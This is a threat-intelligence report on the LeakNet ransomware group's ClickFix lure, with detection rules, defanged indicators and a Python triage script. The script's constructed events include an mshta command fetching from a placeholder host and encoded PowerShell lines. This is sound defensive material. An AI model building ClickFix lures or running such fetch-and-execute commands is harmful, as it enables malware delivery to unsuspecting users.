Full Report
The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic, delivered through compromised websites, as an initial access method. The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from traditional methods of obtaining initial access, such as through stolen credentials.
Analysis Summary
# Tool/Technique: ClickFix (LeakNet Variant)
## Overview
ClickFix is a sophisticated social engineering technique that leverages compromised websites to display fake browser/software error messages. It tricks users into manually executing malicious PowerShell commands under the guise of "fixing" a non-existent technical issue. Recently, the **LeakNet** ransomware operation has adopted this method to bypass traditional email filters and automated sandbox detection.
## Technical Details
- **Type**: Social Engineering Technique / Initial Access Vector
- **Platform**: Windows (primarily targets web browser users)
- **Capabilities**: Bypassing Mark-of-the-Web (MotW), delivery of second-stage payloads (infostealers/ransomware), and evasion of automated document scanning.
- **First Seen**: ClickFix methodology emerged in early 2024; adoption by LeakNet documented in late 2024.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566.002 - Phishing: Spearphishing Link
- **TA0002 - Execution**
  - T1059.001 - Command and Scripting Interpreter: PowerShell
  - T1204.001 - User Execution: Malicious Link
  - T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
  - T1132 - Data Encoding (Base64 encoding of clipboard commands)
  - T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass (via manual clipboard execution)
## Functionality
### Core Capabilities
- **Web Overlay Injection**: Compromised websites display high-quality, localized pop-ups (e.g., Google Chrome "Update Error" or MS Word "Font Not Found").
- **Clipboard Hijacking**: The "Fix" button copies a Base64-encoded PowerShell command to the user's clipboard.
- **Manual Execution Induction**: Instructs the user to open a terminal (Win+R -> `cmd` or `powershell`) and paste the content to execute the "patch."
### Advanced Features
- **Evasion of Secure Email Gateways (SEGs)**: Because the initial vector is a compromised legitimate site rather than a malicious attachment, it bypasses standard email security.
- **Bypassing Sandbox Analysis**: Automated sandboxes often fail to trigger the payload because it requires complex human interaction (copy-pasting and manual terminal entry).
## Indicators of Compromise
*Note: Specific indicators vary per campaign; the following are behavioral and structural patterns associated with ClickFix/LeakNet.*
- **File Names**: `Fix.ps1`, `update.bat`, `Patch.exe`
- **Network Indicators**:
  - `leaknet[.]xyz` (Defanged)
  - `clonercaptcha[.]com` (Defanged - Common ClickFix infrastructure)
  - `api[.]organic-fresh[.]news` (Defanged)
- **Behavioral Indicators**:
  - `powershell.exe` spawned from `cmd.exe` with a command line containing `[System.Convert]::FromBase64String`.
  - Unexpected use of `mshta.exe` or `curl` via manual command-line entry by non-administrative users.
## Associated Threat Actors
- **LeakNet** (Ransomware-as-a-Service)
- **Storm-1679** (Initial access broker known for using similar lures)
## Detection Methods
- **Behavioral Detection**: Monitor for command-line arguments involving `Set-Clipboard` or execution of encoded PowerShell commands initiated by `explorer.exe` or `taskman.exe` (manual user input).
- **Endpoint Monitoring**: Alert on users opening "Run" dialogs or PowerShell immediately after visiting compromised/suspicious domains.
- **Web Content Filtering**: Use URL filtering to block known "ClickFix" infrastructure domains and sites flagged for script injection.
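The behavioral indicators and detection rules above, turned into a small triage routine that runs over process-creation events. This is an added example, not part of the original report: the events are constructed (Sysmon Event ID 1 style fields), the `Admin` flag stands in for a real group lookup, and the parent-process set and switch spellings are assumptions chosen to match the report's description of manual Run-dialog/terminal execution.

```python
import re
from typing import Dict, List

# Constructed process-creation events modelled on Sysmon Event ID 1 fields (not real telemetry).
SAMPLE_EVENTS: List[Dict] = [
    {"User": "CORP\\jdoe", "Admin": False, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -NoP -W Hidden -c "[System.Convert]::FromBase64String(\'VwByAGkAdABlAC0ASABvAHMAdAAgAGgAZQBsAGwAbwA=\')"'},
    {"User": "CORP\\jdoe", "Admin": False, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc VwByAGkAdABlAC0ASABvAHMAdAAgAGgAZQBsAGwAbwA="},
    {"User": "CORP\\jdoe", "Admin": False, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/fix"},  # placeholder URL
    {"User": "NT AUTHORITY\\SYSTEM", "Admin": True, "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"User": "CORP\\jdoe", "Admin": False, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]

# Parents that indicate a human typed the command (Run dialog, cmd, or an interactive shell): assumption.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}
LOLBINS = {"mshta.exe", "curl.exe"}
# Markers named in the report, plus the -e/-enc/-EncodedCommand switch followed by a base64 blob.
ENCODED_RE = re.compile(
    r"FromBase64String|Set-Clipboard|-e(?:c|n|nc|ncoded(?:command)?)?\s+[A-Za-z0-9+/=]{16,}",
    re.IGNORECASE,
)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: Dict) -> List[str]:
    """Return the ClickFix behavioural indicators an event matches (empty list if none)."""
    hits = []
    parent, image, cmd = basename(event["ParentImage"]), basename(event["Image"]), event["CommandLine"]
    if image == "powershell.exe" and parent in INTERACTIVE_PARENTS and ENCODED_RE.search(cmd):
        hits.append("T1059.001 encoded PowerShell from interactive parent")
    if image in LOLBINS and parent in INTERACTIVE_PARENTS and not event["Admin"]:
        hits.append("T1204 manual LOLBin launch by non-admin user")
    return hits

def scan(events: List[Dict]) -> List[Dict]:
    """Run every event through classify() and keep only those that alerted."""
    alerts = []
    for e in events:
        hits = classify(e)
        if hits:
            alerts.append({"User": e["User"], "Image": basename(e["Image"]), "Hits": hits})
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The scheduled SCCM inventory script and the bare interactive `powershell.exe` launch are left alone, which is the precision you need before paging on every encoded command line.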
## Mitigation Strategies
- **Prevention**: Implement a robust Web Content Filter to block access to newly registered domains and known compromised sites.
- **Hardening**: Disable PowerShell for non-privileged users or enforce **Constrained Language Mode**.
- **User Education**: Train staff specifically on the "Copy-Paste-Execute" lure, emphasizing that legitimate software updates never require manual command-line execution from a web pop-up.
- **Attack Surface Reduction**: Block the execution of commonly abused binaries like `mshta.exe` and `scrcons.exe` if not required for business operations.
## Related Tools/Techniques
- **ClearFake**: A similar social engineering framework using fake browser updates.
- **EtherHiding**: Uses blockchain (BSC) to host malicious code that triggers similar site overlays.
- **SocGholish**: A long-standing framework for delivering malware via fake software updates.